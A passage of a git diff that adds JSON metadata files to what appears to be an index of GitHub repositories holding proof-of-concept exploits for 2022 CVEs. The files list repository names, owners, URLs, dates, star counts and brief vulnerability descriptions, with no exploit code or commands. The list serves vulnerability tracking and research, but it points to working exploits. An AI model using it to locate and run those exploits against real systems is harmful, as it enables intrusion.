"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68978608?v=4", + "html_url": "https:\/\/github.com\/reewardius", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/reewardius\/CVE-2022-32074", + "description": null, + "fork": false, + "created_at": "2023-02-18T13:19:03Z", + "updated_at": "2023-02-18T13:19:03Z", + "pushed_at": "2023-02-18T13:25:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32114.json b/2022/CVE-2022-32114.json new file mode 100644 index 0000000000..a27be28165 --- /dev/null +++ b/2022/CVE-2022-32114.json @@ -0,0 +1,33 @@ +[ + { + "id": 497629346, + "name": "CVE-2022-32114", + "full_name": "bypazs\/CVE-2022-32114", + "owner": { + "login": "bypazs", + "id": 5837953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837953?v=4", + "html_url": "https:\/\/github.com\/bypazs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bypazs\/CVE-2022-32114", + "description": "An unrestricted file upload vulnerability in the Add New Assets function of Strapi v4.1.12 allows attackers to execute arbitrary code via a crafted file.", + "fork": false, + "created_at": "2022-05-29T15:25:08Z", + "updated_at": "2023-03-19T15:10:51Z", + "pushed_at": "2022-07-24T07:17:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32118.json b/2022/CVE-2022-32118.json new file mode 100644 index 0000000000..e4a913b2d3 --- /dev/null +++ b/2022/CVE-2022-32118.json @@ -0,0 +1,33 @@ +[ + { + "id": 478398546, + "name": "CVE-2022-32118", + "full_name": "JC175\/CVE-2022-32118", + "owner": { + "login": "JC175", + "id": 33234808, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33234808?v=4", + "html_url": "https:\/\/github.com\/JC175", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JC175\/CVE-2022-32118", + "description": "CVE-2022-32118 - Arox-XSS", + "fork": false, + "created_at": "2022-04-06T04:12:03Z", + "updated_at": "2023-04-04T14:09:56Z", + "pushed_at": "2023-12-20T16:38:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32119.json b/2022/CVE-2022-32119.json new file mode 100644 index 0000000000..9cf4a6c64a --- /dev/null +++ b/2022/CVE-2022-32119.json @@ -0,0 +1,33 @@ +[ + { + "id": 478403236, + "name": "CVE-2022-32119", + "full_name": "JC175\/CVE-2022-32119", + "owner": { + "login": "JC175", + "id": 33234808, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33234808?v=4", + "html_url": "https:\/\/github.com\/JC175", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JC175\/CVE-2022-32119", + "description": "CVE-2022-32119 - Arox-Unrestricted-File-Upload", + "fork": false, + "created_at": "2022-04-06T04:33:47Z", + "updated_at": "2024-08-12T20:22:11Z", + "pushed_at": "2023-12-20T16:35:04Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32132.json b/2022/CVE-2022-32132.json new file mode 100644 index 0000000000..8827e85728 --- /dev/null +++ b/2022/CVE-2022-32132.json @@ -0,0 +1,33 @@ +[ + { + "id": 603421211, + "name": "CVE-2022-32132", + "full_name": "reewardius\/CVE-2022-32132", + "owner": { + "login": "reewardius", + "id": 68978608, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68978608?v=4", + "html_url": "https:\/\/github.com\/reewardius", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/reewardius\/CVE-2022-32132", + "description": null, + "fork": false, + "created_at": "2023-02-18T13:11:13Z", + "updated_at": "2023-02-18T13:11:13Z", + "pushed_at": "2023-02-18T13:24:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32199.json b/2022/CVE-2022-32199.json new file mode 100644 index 0000000000..2b2322398f --- /dev/null +++ b/2022/CVE-2022-32199.json @@ -0,0 +1,33 @@ +[ + { + "id": 618754016, + "name": "CVE-2022-32199", + "full_name": "Toxich4\/CVE-2022-32199", + "owner": { + "login": "Toxich4", + "id": 47368696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47368696?v=4", + "html_url": "https:\/\/github.com\/Toxich4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Toxich4\/CVE-2022-32199", + "description": null, + "fork": false, + "created_at": "2023-03-25T08:49:58Z", + "updated_at": "2023-03-26T15:11:43Z", + "pushed_at": "2023-03-29T12:58:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32206.json b/2022/CVE-2022-32206.json new file mode 100644 index 0000000000..23defae17c --- /dev/null +++ b/2022/CVE-2022-32206.json @@ -0,0 +1,33 @@ +[ + { + "id": 892027168, + "name": "external_curl_AOSP10_CVE-2022-32206", + "full_name": "HimanshuS67\/external_curl_AOSP10_CVE-2022-32206", + "owner": { + "login": "HimanshuS67", + "id": 188300861, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188300861?v=4", + "html_url": "https:\/\/github.com\/HimanshuS67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HimanshuS67\/external_curl_AOSP10_CVE-2022-32206", + "description": null, + "fork": false, + "created_at": "2024-11-21T11:38:25Z", + "updated_at": "2024-11-21T11:40:09Z", + "pushed_at": "2024-11-21T11:40:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32223.json b/2022/CVE-2022-32223.json new file mode 100644 index 0000000000..6b244ec38e --- /dev/null +++ b/2022/CVE-2022-32223.json @@ -0,0 +1,33 @@ +[ + { + "id": 550267908, + "name": "cve-2022-32223", + "full_name": "ianyong\/cve-2022-32223", + "owner": { + "login": "ianyong", + "id": 5585517, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5585517?v=4", + "html_url": "https:\/\/github.com\/ianyong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ianyong\/cve-2022-32223", + "description": null, + "fork": false, + "created_at": "2022-10-12T13:24:46Z", + "updated_at": "2023-05-23T11:57:25Z", + "pushed_at": "2022-10-12T16:57:27Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32224.json b/2022/CVE-2022-32224.json new file mode 100644 index 0000000000..0d6ee08d75 --- /dev/null +++ b/2022/CVE-2022-32224.json @@ -0,0 +1,33 @@ +[ + { + "id": 514743200, + "name": "cve-2022-32224-rails", + "full_name": "ooooooo-q\/cve-2022-32224-rails", + "owner": { + "login": "ooooooo-q", + "id": 395584, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/395584?v=4", + "html_url": "https:\/\/github.com\/ooooooo-q", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ooooooo-q\/cve-2022-32224-rails", + "description": null, + "fork": false, + "created_at": "2022-07-17T04:09:03Z", + "updated_at": "2023-06-14T04:51:40Z", + "pushed_at": "2022-08-06T06:44:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32250.json b/2022/CVE-2022-32250.json new file mode 100644 index 0000000000..7a1b9cefc0 --- /dev/null +++ b/2022/CVE-2022-32250.json @@ -0,0 +1,126 @@ +[ + { + "id": 528286745, + "name": "CVE-2022-32250-exploit", + "full_name": "theori-io\/CVE-2022-32250-exploit", + "owner": { + "login": "theori-io", + "id": 18063559, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18063559?v=4", + "html_url": "https:\/\/github.com\/theori-io", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/theori-io\/CVE-2022-32250-exploit", + "description": null, + "fork": false, + "created_at": "2022-08-24T06:00:47Z", + "updated_at": "2024-09-18T13:54:55Z", + "pushed_at": "2023-06-18T14:43:52Z", + "stargazers_count": 169, + "watchers_count": 169, + "has_discussions": false, + "forks_count": 43, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 43, + "watchers": 169, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 594075430, + "name": "CVE-2022-32250-LPE", + "full_name": "ysanatomic\/CVE-2022-32250-LPE", + "owner": { + "login": "ysanatomic", + "id": 41269324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41269324?v=4", + "html_url": "https:\/\/github.com\/ysanatomic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ysanatomic\/CVE-2022-32250-LPE", + "description": "LPE PoC of a user-after-free vulnerability in the Linux netfilter subsystem.", + "fork": false, + "created_at": "2023-01-27T14:44:39Z", + "updated_at": "2024-07-18T04:25:27Z", + "pushed_at": "2023-02-04T16:27:22Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 716574497, + "name": "2022-32250LPE", + "full_name": "Decstor5\/2022-32250LPE", + "owner": { + "login": "Decstor5", + "id": 95436708, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95436708?v=4", + "html_url": "https:\/\/github.com\/Decstor5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Decstor5\/2022-32250LPE", + "description": "CVE-2022-32250-LPE", + "fork": false, + "created_at": "2023-11-09T12:27:26Z", + "updated_at": "2023-11-09T12:27:26Z", + "pushed_at": "2023-11-09T13:47:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812759874, + "name": "CVE-2022-32250", + "full_name": "Kristal-g\/CVE-2022-32250", + "owner": { + "login": "Kristal-g", + "id": 61376744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61376744?v=4", + "html_url": "https:\/\/github.com\/Kristal-g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kristal-g\/CVE-2022-32250", + "description": "My exploit for CVE-2022-32250 for linux kernel 5.18", + "fork": false, + "created_at": "2024-06-09T19:53:54Z", + "updated_at": "2024-06-09T20:03:01Z", + "pushed_at": "2024-06-09T20:02:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32532.json b/2022/CVE-2022-32532.json new file mode 100644 index 0000000000..251c1a168b --- /dev/null +++ b/2022/CVE-2022-32532.json @@ -0,0 +1,33 @@ +[ + { + "id": 508501723, + "name": "CVE-2022-32532", + "full_name": "Lay0us\/CVE-2022-32532", + "owner": { + "login": "Lay0us", + "id": 99304369, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99304369?v=4", + "html_url": "https:\/\/github.com\/Lay0us", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lay0us\/CVE-2022-32532", + "description": "Apache Shiro CVE-2022-32532", + "fork": false, + "created_at": "2022-06-29T01:05:33Z", + "updated_at": "2024-09-04T08:17:13Z", + "pushed_at": "2022-06-28T22:46:43Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 27, + "watchers": 11, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32548.json b/2022/CVE-2022-32548.json new file mode 100644 index 0000000000..29d4c521bd --- /dev/null +++ b/2022/CVE-2022-32548.json @@ -0,0 +1,33 @@ +[ + { + "id": 710702628, + "name": "CVE-2022-32548-RCE-POC", + "full_name": "MosaedH\/CVE-2022-32548-RCE-POC", + "owner": { + "login": "MosaedH", + "id": 75680991, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75680991?v=4", + "html_url": "https:\/\/github.com\/MosaedH", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MosaedH\/CVE-2022-32548-RCE-POC", + "description": null, + "fork": false, + "created_at": "2023-10-27T08:58:11Z", + "updated_at": "2024-11-11T07:56:41Z", + "pushed_at": "2023-10-27T09:00:33Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32832.json b/2022/CVE-2022-32832.json new file mode 100644 index 0000000000..819daa1516 --- /dev/null +++ b/2022/CVE-2022-32832.json @@ -0,0 +1,64 @@ +[ + { + "id": 516376265, + "name": "CVE-2022-32832", + "full_name": "Muirey03\/CVE-2022-32832", + "owner": { + "login": "Muirey03", + "id": 31448720, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31448720?v=4", + "html_url": "https:\/\/github.com\/Muirey03", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Muirey03\/CVE-2022-32832", + "description": "Proof-of-concept and write-up for the CVE-2022-32832 vulnerability patched in iOS 15.6", + "fork": false, + "created_at": "2022-07-21T13:09:50Z", + "updated_at": "2024-10-21T10:38:25Z", + "pushed_at": "2022-07-21T13:44:32Z", + "stargazers_count": 96, + "watchers_count": 96, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 96, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 516837211, + "name": "CVE-2022-32832", + "full_name": "AkbarTrilaksana\/CVE-2022-32832", + "owner": { + "login": "AkbarTrilaksana", + "id": 108668044, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108668044?v=4", + "html_url": "https:\/\/github.com\/AkbarTrilaksana", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AkbarTrilaksana\/CVE-2022-32832", + "description": null, + "fork": false, + "created_at": "2022-07-22T17:37:27Z", + "updated_at": "2022-08-06T20:52:44Z", + "pushed_at": "2022-07-22T17:37:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32862.json b/2022/CVE-2022-32862.json new file mode 100644 index 0000000000..0e16bed264 --- /dev/null +++ b/2022/CVE-2022-32862.json @@ -0,0 +1,33 @@ +[ + { + "id": 691220861, + "name": "CVE-2022-32862", + "full_name": "rohitc33\/CVE-2022-32862", + "owner": { + "login": "rohitc33", + "id": 70339497, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70339497?v=4", + "html_url": "https:\/\/github.com\/rohitc33", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rohitc33\/CVE-2022-32862", + "description": "macOS TCC bypass", + "fork": false, + "created_at": "2023-09-13T18:29:27Z", + "updated_at": "2024-07-24T08:39:11Z", + "pushed_at": "2023-09-13T18:33:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32883.json b/2022/CVE-2022-32883.json new file mode 100644 index 0000000000..cc05c5797f --- /dev/null +++ b/2022/CVE-2022-32883.json @@ -0,0 +1,35 @@ +[ + { + "id": 538159673, + "name": "CVE-2022-32883", + "full_name": "breakpointHQ\/CVE-2022-32883", + "owner": { + "login": "breakpointHQ", + "id": 88584206, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88584206?v=4", + "html_url": "https:\/\/github.com\/breakpointHQ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/breakpointHQ\/CVE-2022-32883", + "description": "Turning Your Computer Into a GPS Tracker With Apple Maps", + "fork": false, + "created_at": "2022-09-18T15:51:52Z", + "updated_at": "2024-01-10T06:15:29Z", + "pushed_at": "2024-02-06T11:51:08Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "macos" + ], + "visibility": "public", + "forks": 5, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32898.json b/2022/CVE-2022-32898.json new file mode 100644 index 0000000000..afafa95b9a --- /dev/null +++ b/2022/CVE-2022-32898.json @@ -0,0 +1,33 @@ +[ + { + "id": 776714071, + "name": "CVE-2022-32898", + "full_name": "ox1111\/CVE-2022-32898", + "owner": { + "login": "ox1111", + "id": 31942498, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31942498?v=4", + "html_url": "https:\/\/github.com\/ox1111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ox1111\/CVE-2022-32898", + "description": null, + "fork": false, + "created_at": "2024-03-24T09:26:29Z", + "updated_at": "2024-03-24T09:26:29Z", + "pushed_at": "2024-03-24T10:41:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32932.json b/2022/CVE-2022-32932.json new file mode 100644 index 0000000000..5c8de348ca --- /dev/null +++ b/2022/CVE-2022-32932.json @@ -0,0 +1,33 @@ +[ + { + "id": 777471417, + "name": "CVE-2022-32932", + "full_name": "ox1111\/CVE-2022-32932", + "owner": { + "login": "ox1111", + "id": 31942498, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31942498?v=4", + "html_url": "https:\/\/github.com\/ox1111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ox1111\/CVE-2022-32932", + "description": null, + "fork": false, + "created_at": "2024-03-25T23:00:41Z", + "updated_at": "2024-07-31T09:46:19Z", + "pushed_at": "2024-03-25T23:26:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32947.json b/2022/CVE-2022-32947.json new file mode 100644 index 0000000000..75fbf9af49 --- /dev/null +++ b/2022/CVE-2022-32947.json @@ -0,0 +1,33 @@ +[ + { + "id": 692673503, + "name": "agx-exploit", + "full_name": "asahilina\/agx-exploit", + "owner": { + "login": "asahilina", + "id": 102031928, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102031928?v=4", + "html_url": "https:\/\/github.com\/asahilina", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asahilina\/agx-exploit", + "description": "CVE-2022-32947 walkthough and demo", + "fork": false, + "created_at": "2023-09-17T08:21:47Z", + "updated_at": "2024-11-24T21:38:09Z", + "pushed_at": "2023-09-18T03:04:48Z", + "stargazers_count": 155, + "watchers_count": 155, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 155, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32988.json b/2022/CVE-2022-32988.json new file mode 100644 index 0000000000..34ae14c2f1 --- /dev/null +++ b/2022/CVE-2022-32988.json @@ -0,0 +1,33 @@ +[ + { + "id": 500171901, + "name": "CVE-2022-32988", + "full_name": "FedericoHeichou\/CVE-2022-32988", + "owner": { + "login": "FedericoHeichou", + "id": 34757141, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34757141?v=4", + "html_url": "https:\/\/github.com\/FedericoHeichou", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FedericoHeichou\/CVE-2022-32988", + "description": null, + "fork": false, + "created_at": "2022-06-05T17:56:29Z", + "updated_at": "2022-06-28T18:35:59Z", + "pushed_at": "2022-06-28T18:33:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-33075.json b/2022/CVE-2022-33075.json new file mode 100644 index 0000000000..38745aeba4 --- /dev/null +++ b/2022/CVE-2022-33075.json @@ -0,0 +1,33 @@ +[ + { + "id": 514549858, + "name": "CVE-2022-33075", + "full_name": "angelopioamirante\/CVE-2022-33075", + "owner": { + "login": "angelopioamirante", + "id": 38589929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38589929?v=4", + "html_url": "https:\/\/github.com\/angelopioamirante", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/angelopioamirante\/CVE-2022-33075", + "description": "Zoo Management System 1.0 - Stored Cross-Site-Scripting (XSS)", + "fork": false, + "created_at": "2022-07-16T10:44:52Z", + "updated_at": "2022-07-16T10:44:52Z", + "pushed_at": "2022-07-16T10:54:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-33082.json b/2022/CVE-2022-33082.json new file mode 100644 index 0000000000..8c518436d6 --- /dev/null +++ b/2022/CVE-2022-33082.json @@ -0,0 +1,33 @@ +[ + { + "id": 657277228, + "name": "cve-2022-33082-exploit", + "full_name": "cyberqueenmeg\/cve-2022-33082-exploit", + "owner": { + "login": "cyberqueenmeg", + "id": 62813469, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62813469?v=4", + "html_url": "https:\/\/github.com\/cyberqueenmeg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyberqueenmeg\/cve-2022-33082-exploit", + "description": null, + "fork": false, + "created_at": "2023-06-22T17:50:18Z", + "updated_at": "2023-06-22T18:49:31Z", + "pushed_at": "2023-06-22T22:53:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3317.json b/2022/CVE-2022-3317.json new file mode 100644 index 0000000000..2f5cc67581 --- /dev/null +++ b/2022/CVE-2022-3317.json @@ -0,0 +1,33 @@ +[ + { + "id": 588477448, + "name": "CVE-2022-3317", + "full_name": "hfh86\/CVE-2022-3317", + "owner": { + "login": "hfh86", + "id": 42328886, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42328886?v=4", + "html_url": "https:\/\/github.com\/hfh86", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hfh86\/CVE-2022-3317", + "description": "Insufficient validation of untrusted input in Intents in Google Chrome on Android prior to 106.0.5249.62 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low)", + "fork": false, + "created_at": "2023-01-13T08:06:54Z", + "updated_at": "2023-01-13T08:06:54Z", + "pushed_at": "2023-01-13T08:06:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-33174.json b/2022/CVE-2022-33174.json new file mode 100644 index 0000000000..ed194e77e4 --- /dev/null +++ b/2022/CVE-2022-33174.json @@ -0,0 +1,33 @@ +[ + { + "id": 531754524, + "name": "CVE-2022-33174", + "full_name": "Henry4E36\/CVE-2022-33174", + "owner": { + "login": "Henry4E36", + "id": 41940481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41940481?v=4", + "html_url": "https:\/\/github.com\/Henry4E36", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Henry4E36\/CVE-2022-33174", + "description": "Powertek PDU身份绕过", + "fork": false, + "created_at": "2022-09-02T02:27:31Z", + "updated_at": "2024-07-17T14:32:15Z", + "pushed_at": "2022-09-02T02:32:54Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3328.json b/2022/CVE-2022-3328.json new file mode 100644 index 0000000000..e549e9c768 --- /dev/null +++ b/2022/CVE-2022-3328.json @@ -0,0 +1,33 @@ +[ + { + "id": 572958937, + "name": "CVE-2022-3328", + "full_name": "Mr-xn\/CVE-2022-3328", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2022-3328", + "description": "CVE-2022-3328 with CVE-2022-41974 and CVE-2022-41973", + "fork": false, + "created_at": "2022-12-01T11:57:25Z", + "updated_at": "2022-12-16T09:03:55Z", + "pushed_at": "2022-12-01T11:58:57Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3357.json b/2022/CVE-2022-3357.json new file mode 100644 index 0000000000..d1f935b93f --- /dev/null +++ b/2022/CVE-2022-3357.json @@ -0,0 +1,33 @@ +[ + { + "id": 824252334, + "name": "CVE-2021-3493_CVE-2022-3357", + "full_name": "iamz24\/CVE-2021-3493_CVE-2022-3357", + "owner": { + "login": "iamz24", + "id": 97619614, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97619614?v=4", + "html_url": "https:\/\/github.com\/iamz24", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iamz24\/CVE-2021-3493_CVE-2022-3357", + "description": null, + "fork": false, + "created_at": "2024-07-04T17:29:28Z", + "updated_at": "2024-07-04T20:20:33Z", + "pushed_at": "2024-07-04T20:20:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-33679.json b/2022/CVE-2022-33679.json new file mode 100644 index 0000000000..888c21f6c6 --- /dev/null +++ b/2022/CVE-2022-33679.json @@ -0,0 +1,126 